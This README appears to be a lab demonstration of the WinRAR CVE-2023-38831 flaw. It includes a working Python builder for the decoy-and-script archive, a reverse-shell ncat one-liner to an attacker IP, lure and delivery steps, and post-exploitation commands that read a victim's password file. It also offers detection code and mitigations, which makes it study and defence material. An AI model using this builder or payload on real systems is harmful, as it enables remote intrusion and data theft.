POC details: 7cb8e9a45ff3247f543555416f3f747d20e85022

Related vulnerability
Title: WinRAR security vulnerability (CVE-2023-38831)
Description: WinRAR is a file archiver that compresses and extracts RAR, ZIP and other archive formats. RARLabs WinRAR versions before 6.23 contain a security vulnerability that an attacker can use to execute arbitrary code.
Description
A POC demo on CVE-2023-38831
Introduction
# CVE-2023-38831
A POC demo on CVE-2023-38831

<p><strong>Brief description of vulnerability</strong></p>
<ul>
<li>CVE-2023-38831 is an arbitrary code execution vulnerability in WinRAR.</li>
<li>The exploited software is WinRAR, one of the most widely installed archive utilities on Windows.</li>
<li>WinRAR packs files and folders into compressed archives (RAR, ZIP and other formats), which saves disk space and makes sharing files faster and easier.</li>
<li>Exploitation in the wild dates back to April 2023; the bug was fixed in WinRAR 6.23, released in August 2023.</li>
<li>It affects WinRAR on Windows, versions 6.22 and earlier.</li>
<li>The root cause is in the routine WinRAR runs when the user opens a file from inside an archive (the referenced analysis identifies it only by its runtime address, winrar.7FF6CE909948): it selects the entries to extract by matching the beginning of the name instead of comparing full names. An archive can therefore hold a decoy file such as “document.pdf ” (note the trailing space) next to a folder of the same name containing “document.pdf .cmd”; both are written to WinRAR's temporary folder, and Windows then launches the .cmd script instead of the decoy.</li>
<li>It requires user interaction: the victim must open the archive and double-click the decoy file.</li>
</ul>
<br />
<p><strong>How does the vulnerability work?</strong></p>

![image](https://github.com/user-attachments/assets/fdea3bb6-bcb7-41cc-85a8-5058116b3c71)


<h2>Demonstration of the exploit</h2>
<p><strong><u>First part of the exploitation</u></strong></p>
<p>The first half will take place at the attacker machine for the exploitation to begin.</p>



![image](https://github.com/user-attachments/assets/f058b383-1596-460b-823b-d69d123b7151)
<p>1) First, create the exploitation folder containing the decoy “pdf”, the exploit Python code and the batch script by cloning the repository:
“git clone https://github.com/HDCE-inc/CVE-2023-38831”</p>
<p>&nbsp;</p>

![image](https://github.com/user-attachments/assets/14623401-2d67-4f43-b1f2-91b7771df500)
<p>2) This is what the folder contains before any exploitation takes place:</p>
<ol>
<li>document.pdf, the decoy that lures the victim into double-clicking the malicious entry</li>
<li>exploit.py, the code that builds the malicious archive</li>
<li>script.bat, the batch script that will run on the victim machine</li>
</ol>
<p>&nbsp;</p>


![Picture2](https://github.com/user-attachments/assets/a9290955-bae0-465b-8f95-629c97d61a85)
<p>3) Find the Kali machine's IP address with ifconfig:</p>
<p>&nbsp;</p>

![image](https://github.com/user-attachments/assets/5933a445-d448-459d-9fd5-191e1b91d719)
<p>4) Next, replace the contents of script.bat with the command line shown in the image above.</p>
<p>“start” launches a new process, “/min” starts it minimised so the command window stays out of sight, “ncat” connects to the attacker's IP address on port 4444, and “-e cmd.exe” attaches cmd.exe to that connection, giving the attacker an interactive command prompt on the victim (a reverse shell).</p>
<p>&nbsp;</p>

![image](https://github.com/user-attachments/assets/091a1f12-4f08-44cc-a19d-4d747631eeba)
<p>5) The exploit.py code, explained by the numbered regions in the image:</p>
<p><sup>1</sup> reads three user inputs: the bait file name (document.pdf), the script file name (script.bat) and the output name the victim will see for the archive; in this case we save it as getrich.rar.</p>
<p><sup>2</sup> checks that the bait and script files exist in the CVE-2023-38831 folder on the Kali machine with the expected naming convention; if a name is wrong or a file is duplicated, an error message is printed and the program exits.</p>
<p><sup>3</sup> creates a temporary working folder with os.mkdir() in which the files are staged before being compressed into the archive.</p>
<p><sup>4</sup> copies the bait and the script with shutil.copyfile into their respective locations inside “tmp”, so that everything is correct and in place before the next step. shutil.make_archive then creates an archive named “tmp.zip” containing everything in the “tmp” folder.</p>
<p><sup>5</sup> shows the code running successfully and producing the archive under the output name given by the user. Note that the output is the ZIP produced by make_archive saved under a .rar name; WinRAR recognises the format from the file content, not the extension.</p>
<p>&nbsp;</p>

![image](https://github.com/user-attachments/assets/67dedc59-7daf-436b-a0df-8260277fc5a8)
<p>6) With our IP address known and the batch script modified, we can now create the malicious “.rar” by running “python exploit.py”.</p>
<p>exploit.py asks for three inputs: the bait file name, which must exist (document.pdf); the script file name we modified earlier (script.bat); and an output RAR file name that should look enticing enough for the victim to download and open. In this case we used “steps-to-generate-income.rar”.
The CVE-2023-38831 archive is now ready to be delivered to the victim machine.</p>
<p>&nbsp;</p>
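Steps 4 and 5 above describe how exploit.py stages the files and archives them. The following block is an added example and is not code from the HDCE-inc repository: it builds the same file/folder layout directly with Python's zipfile module (no placeholder-character trick is needed, because the archive's central directory may carry a name with a trailing space even though the Windows filesystem would strip it), and it adds the check a defender wants, a scanner that flags an archive containing a file entry and a same-named folder holding a script. The decoy name, script body and script-extension list are assumptions chosen for the demo.

```python
"""Added example: build and detect the CVE-2023-38831 archive layout.

Layout used by the public POCs (reproduced here with zipfile):
    document.pdf                      <- decoy the victim double-clicks (trailing space)
    document.pdf /document.pdf .cmd   <- script in a folder with the same name
WinRAR extracts both because it matches entry names by prefix, and Windows
then runs the .cmd in place of the decoy.
"""
import io
import zipfile

# Extensions that Windows will execute when handed to the shell (assumption
# for the demo; extend to taste).
SCRIPT_EXTENSIONS = (".cmd", ".bat", ".exe", ".vbs", ".js", ".ps1", ".scr", ".hta", ".lnk")


def build_archive(entries: dict[str, bytes]) -> bytes:
    """Write the given name -> content mapping into an in-memory ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)          # zipfile keeps trailing spaces intact
    return buf.getvalue()


def build_poc_archive(bait_name: str, bait_bytes: bytes, script_bytes: bytes,
                      script_ext: str = ".cmd") -> bytes:
    """Return ZIP bytes with the same-name file/folder trick applied to bait_name.

    WinRAR opens the result whether it is saved as .zip or .rar, since it
    detects the format from the content.
    """
    decoy = bait_name + " "                  # "document.pdf " (trailing space)
    return build_archive({
        decoy: bait_bytes,                   # the file shown to the victim
        f"{decoy}/{decoy}{script_ext}": script_bytes,  # same name, one level down
    })


def find_cve_2023_38831_pattern(zip_bytes: bytes) -> list[dict]:
    """Flag file entries that have a same-named directory containing a script.

    Such a pair cannot exist on a normal filesystem (a name is either a file
    or a folder), so any hit is a strong indicator of a crafted archive.
    Returns one finding per (bait, script) pair; [] means no match.
    """
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
    files = [n for n in names if not n.endswith("/")]
    findings = []
    for bait in files:
        prefix = bait + "/"
        for other in files:
            if other.startswith(prefix) and other.lower().endswith(SCRIPT_EXTENSIONS):
                findings.append({
                    "bait": bait,
                    "script": other,
                    "trailing_space": bait != bait.rstrip(),
                })
    return findings


if __name__ == "__main__":
    # Constructed sample input: a fake PDF header and a reverse-shell one-liner.
    poc = build_poc_archive("document.pdf", b"%PDF-1.4 demo",
                            b"start /min ncat 192.168.56.101 4444 -e cmd.exe\r\n")
    for hit in find_cve_2023_38831_pattern(poc):
        print(f"suspicious: {hit['bait']!r} shadowed by {hit['script']!r}")
```

The scanner works on ZIP archives only; for RAR-format archives the same prefix comparison can be applied to the entry names returned by a RAR parser.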

<hr>
<p><strong><u>Second part of the exploitation</u></strong></p>
<p>The second half takes place on both the Kali machine and the victim machine, a Windows 11 VM.</p>

![image](https://github.com/user-attachments/assets/e6ef50e8-f7cb-4eb6-a1cc-c4349c8b9a2d)
<p>1) The archive is delivered either through a malicious website or as an attachment sent to the victim.<br />On the left, we run “python -m http.server 8080”, which serves the current folder over HTTP and logs every request with the client IP address, timestamp, requested path and status code (200 for a successful download); this is how we learn the victim's IP address. On the right, the victim is lured to the attacker's IP address and downloads the file “steps-to-generate-income.rar”.</p>
<p>&nbsp;</p>

![image](https://github.com/user-attachments/assets/aae2a839-c04f-4b0f-9ba4-af7bb1d54f87)
<p>2) Once the victim has downloaded the malicious file “steps-to-generate-income.rar”, the server log shows which IP address fetched it and when. From this entry we obtain the victim's IP address.</p>
<p>&nbsp;</p>

![image](https://github.com/user-attachments/assets/36b6a961-1a70-4106-b375-325934496f9a)
<p>3) We then start an ncat listener on port 4444 on the Kali machine, the same port written into script.bat.<br />When the victim double-clicks document.pdf inside the archive, WinRAR extracts both the decoy and the script, and script.bat runs minimised in the background and connects back to the listener, giving the attacker a reverse shell on the victim machine.</p>
<p>&nbsp;</p>

![Picture3](https://github.com/user-attachments/assets/c02b6c56-7d09-4d92-bdff-2e0de9efc70a)
<p>4) We are now able to run commands on the victim machine, for example changing to “C:\Windows” and running “dir” to list the executables stored there.</p>
<p>Here are three commands that were run on the victim machine:</p>
<p>First, highlighted as “1”, “net user” lists the local accounts; from this we can conclude that there is only one account, W11.</p>
<p>Second, highlighted as “2”, “systeminfo” gathers OS, patch level and hardware details of the victim machine. The shell runs with the privileges of the user who opened the archive, which in this demo is an administrator account.</p>
<p>Third, highlighted as “3”, we browse the file system: “C:\Users\W11” followed by “dir” to see which files and folders exist, then “C:\Users\W11\Documents” followed by “dir” to list the Documents folder, where this user happens to have saved a password in a text file. “type secret.txt” prints its contents to the command line. This shows that from the shell we can read, write and edit files on the victim machine, and further actions such as planting a keylogger could expose even more sensitive information.</p>

![image](https://github.com/user-attachments/assets/3f00f8a4-bb8f-415d-b213-d09ebdb9dd26)
<p>5) Lastly, we create a text file on the user's desktop with the command<br />“echo "You've been hacked, please go to testingwebsite" > C:\Users\W11\D\hacked.txt”, and hacked.txt appears on the desktop to show the victim that the machine has been compromised.</p>

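The victim-side chain described in steps 3 to 5 (WinRAR extracts to a temporary folder, the .cmd runs, ncat connects back) is what a defender can hunt for. The block below is an added example, not part of the POC: a small rule over process-creation events that flags a shell spawned directly by WinRAR.exe, with extra weight when the command line points into WinRAR's temporary extraction folder or contains a “decoy-name .cmd” style name. The event field names follow Sysmon Event ID 1 (assumption), the Rar$ temporary-folder naming is taken from public analyses of this CVE, and the sample events are constructed to mirror this demo.

```python
"""Added example: detect the process chain produced by a CVE-2023-38831 lure.

Expected shape on the victim (constructed from the demo's steps):
    WinRAR.exe -> cmd.exe /c "...\\Rar$DIa<pid>.<n>\\document.pdf .cmd" -> ncat.exe
"""
import re

# Interpreters that a double-extension decoy typically ends up in (assumption).
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# WinRAR's temporary extraction folder, e.g. ...\Temp\Rar$DIa4120.31337\ (public analyses).
RAR_TEMP = re.compile(r"\\Rar\$[A-Za-z]{2,4}\d+\.\d+\\", re.IGNORECASE)

# "document.pdf .cmd": document-looking name, a space, then a script extension.
DECOY_SCRIPT = re.compile(r"\.(pdf|docx?|xlsx?|jpe?g|png|txt) \.(cmd|bat|vbs|js|ps1)\b",
                          re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased last path component, accepting either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_winrar_children(events: list[dict]) -> list[dict]:
    """Return one finding per event where WinRAR.exe spawns a shell.

    Each finding lists the reasons it matched, so an analyst can rank
    a bare WinRAR->cmd.exe launch below one that also shows the temp
    folder and the decoy-style script name.
    """
    findings = []
    for ev in events:
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        cmdline = ev.get("CommandLine", "")
        if parent != "winrar.exe" or child not in SHELLS:
            continue
        reasons = ["shell spawned directly by WinRAR.exe"]
        if RAR_TEMP.search(cmdline):
            reasons.append("script launched from WinRAR temp extraction folder")
        if DECOY_SCRIPT.search(cmdline):
            reasons.append("decoy-style double extension with embedded space")
        findings.append({"pid": ev.get("ProcessId"), "command": cmdline, "reasons": reasons})
    return findings


# Constructed sample events in Sysmon Event ID 1 field names (assumption).
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "ParentImage": r"C:\Program Files\WinRAR\WinRAR.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c ""C:\Users\W11\AppData\Local\Temp\Rar$DIa4120.31337\document.pdf .cmd" "'},
    {"ProcessId": 4188,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Tools\ncat.exe",
     "CommandLine": "ncat 192.168.56.101 4444 -e cmd.exe"},
    {"ProcessId": 5000,  # benign: WinRAR opening a real PDF in a viewer
     "ParentImage": r"C:\Program Files\WinRAR\WinRAR.exe",
     "Image": r"C:\Program Files\Adobe\Acrobat.exe",
     "CommandLine": r'"C:\Program Files\Adobe\Acrobat.exe" "C:\Users\W11\AppData\Local\Temp\Rar$DIa5000.123\report.pdf"'},
]


if __name__ == "__main__":
    for hit in flag_winrar_children(SAMPLE_EVENTS):
        print(hit["pid"], "|", "; ".join(hit["reasons"]))
```

The ncat child in the sample is not flagged on its own because its parent is cmd.exe; correlating it by parent PID with the first finding is the natural next step when the events come from a real log.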
<hr>

<h3>Prevention and Mitigation strategies</h3>
<ul>
<li>Upgrade to WinRAR 6.23 or later; only versions 6.22 and earlier are affected.
<ul>
<li>Pros: the software can be used safely again, and performance is often improved</li>
<li>Cons: features of the previous version might be removed or replaced</li>
</ul>
</li>
<li>Implement the principle of least privilege on all systems.
<ul>
<li>Pros: restricting user rights reduces the impact and lowers the risk if an attack occurs (the reverse shell in this demo inherits the victim's privileges)</li>
<li>Cons: it is hard to keep every user's permissions consistently correct in a large organisation, which can lead to inconsistency and errors</li>
</ul>
</li>
<li>Practise basic cyber hygiene and always back up data to a secure location.
<ul>
<li>Pros: users learn to identify phishing and suspicious websites, and backups prevent data loss in the event of an attack</li>
<li>Cons: unnecessary backups lead to data redundancy and inconsistency for data that is not meaningful to the organisation</li>
</ul>
</li>
<li>Always install anti-virus software as an additional layer of security.</li>
</ul>

<hr>






File snapshot

[4.0K] /data/pocs/7cb8e9a45ff3247f543555416f3f747d20e85022 └── [ 11K] README.md 0 directories, 1 file